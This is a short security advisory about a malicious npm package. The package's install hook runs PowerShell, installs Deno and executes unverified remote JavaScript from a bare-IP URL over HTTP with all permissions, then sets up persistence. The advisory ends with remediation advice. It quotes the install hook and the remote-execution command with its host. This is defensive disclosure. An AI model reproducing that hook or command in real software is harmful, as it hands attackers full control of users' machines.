package.json declares an install lifecycle hook ("install": "node setup.js") that automatically executes on npm install. setup.js runs a PowerShell payload that installs Scoop/winget, installs the Deno runtime, then invokes 'deno run -A' against http://172.94.9.157/v028f8cde892b0b74c8.js — remote, unpinned, unverified JavaScript fetched over plain HTTP from a bare IP address and executed with all Deno permissions granted. The fetched code is described in setup.js comments as a server-compiled 'launcher' that in turn fetches a 'launcher-2' setting up autorun persistence, with comments framing the sequence as benign to obscure that arbitrary remote code is executed at install time. The alternate-runtime hop (Node lifecycle -> PowerShell -> Deno) and the plain-HTTP bare-IP delivery grant the operator of 172.94.9.157 (and any on-path attacker) full code execution on the installer host and a persistence foothold. ## Source: ghsa-malware (964a3f6c00b9b203b2ce5d2bf2a913e877d136325b805010ef3615c2dcc6a52a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
